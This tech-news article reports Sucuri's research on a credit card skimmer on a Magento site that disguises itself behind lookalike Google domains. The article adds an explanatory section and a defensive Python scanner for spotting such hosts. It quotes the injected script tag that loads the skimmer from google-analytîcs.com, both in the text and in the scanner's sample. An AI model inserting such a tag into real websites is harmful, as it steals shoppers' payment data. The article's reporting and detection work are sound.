// Techno NEWS // Malicious Google Domains Used in Attacks on Magento


Hackers use fake Google domains convincing enough to fool website visitors into believing that infected websites are safe when they conduct online transactions.


On Thursday, Sucuri researchers published a recent case reported by the owner of a Magento website.

The site had been infected by a credit card skimmer: JavaScript code containing a link to the malicious domain google-analytîcs[.]com.

An example of the code used:
<script type="text/javascript" src="//google-analytîcs.com/www.[edited].com/3f5cf4657d5d9.js"></script>

"Visitors to the website can see a trustworthy name (such as Google) in queries and assume that they can be safely loaded, without noticing that the domain does not match perfectly and that it is actually malicious," say researchers about this attack process.
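A defender-side check for the lookalike trick described above, as an added example that is not from Sucuri or the original post: it scans page HTML for script hosts that match a trusted domain only after punycode and accents are folded away. The `TRUSTED` list, the function names and the sample markup are assumptions, and the fold catches accent-based lookalikes such as î only, not ASCII swaps like l for i.

```python
import re
import unicodedata
from urllib.parse import urlsplit

# Assumption: script hosts this store legitimately uses (edit for your site).
TRUSTED = {"google-analytics.com", "googletagmanager.com"}

# Tolerates stray whitespace inside tags, as in the sample quoted in the article.
SCRIPT_SRC = re.compile(r"<\s*script\b[^>]*?\bsrc\s*=\s*[\"']\s*([^\"'\s>]+)", re.I)

def to_unicode(host):
    """Decode punycode (xn--) labels so both spellings are compared alike."""
    try:
        return host.encode("ascii").decode("idna")
    except UnicodeError:
        return host  # already Unicode, or not valid punycode

def skeleton(host):
    """Strip accents: 'î' decomposes to 'i' + a combining mark, which is dropped."""
    decomposed = unicodedata.normalize("NFKD", to_unicode(host.lower()))
    return "".join(c for c in decomposed if not unicodedata.combining(c))

def lookalike_script_hosts(html):
    """Return (host, trusted_domain) for script hosts imitating a trusted domain."""
    findings = []
    for src in SCRIPT_SRC.findall(html):
        host = urlsplit(src).hostname
        if not host:
            continue  # relative URL, i.e. a same-origin script
        folded = skeleton(host)
        base = ".".join(folded.split(".")[-2:])  # naive registrable domain
        # Flag only hosts that needed folding to look like a trusted domain.
        if folded != to_unicode(host) and base in TRUSTED:
            findings.append((host, base))
    return findings

# Constructed sample: the tag quoted in the article plus two legitimate ones.
SAMPLE = '''
<script src="https://www.google-analytics.com/analytics.js"></script>
< script type=" text/javascript " src =" //google-analytîcs.com/www.[edited].com/3f5cf4657d5d9.js " > < /script>
<script src="/static/checkout.js"></script>
'''

if __name__ == "__main__":
    for host, imitated in lookalike_script_hosts(SAMPLE):
        print(f"lookalike of {imitated}: {host}")
```

Run it over rendered templates or stored CMS blocks; a hit means the page loads a script from a host that is not the trusted domain it resembles.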

Card skimmer

The website owner became aware of a problem after the site was blacklisted. Sucuri's investigation revealed that the data-capture component of the malware is similar to those found in other skimmers and uses JavaScript to siphon and secretly store all input data and drop-down menu selections.

However, the code changes its behavior depending on whether developer tools are open in Google Chrome or Mozilla Firefox. When they are, the malicious module does not attempt to capture information, which is probably an attempt to avoid detection.

According to Sucuri, the malicious module (a card skimmer) supports "dozens" of payment gateways, and if developer tools are not detected, the stolen information is sent to a remote server, again disguised with another fraudulent domain, google[.]ssl[.]lnfo[.]cc.

Magento, WordPress and Drupal at risk

Card skimmers, installed through vulnerable e-commerce websites, are widespread. In July, RiskIQ reported that a recent spray-and-pray campaign by the Magecart hacking group had successfully infected more than 17,000 websites in a few months.

Magento users, like WordPress and Drupal users, are encouraged to keep their software up to date.

Magento websites are a frequent target for cyber attackers seeking to collect financial data, with about 83% of Magento websites reported as vulnerable in 2018.

Stay Informed, Stay Safe
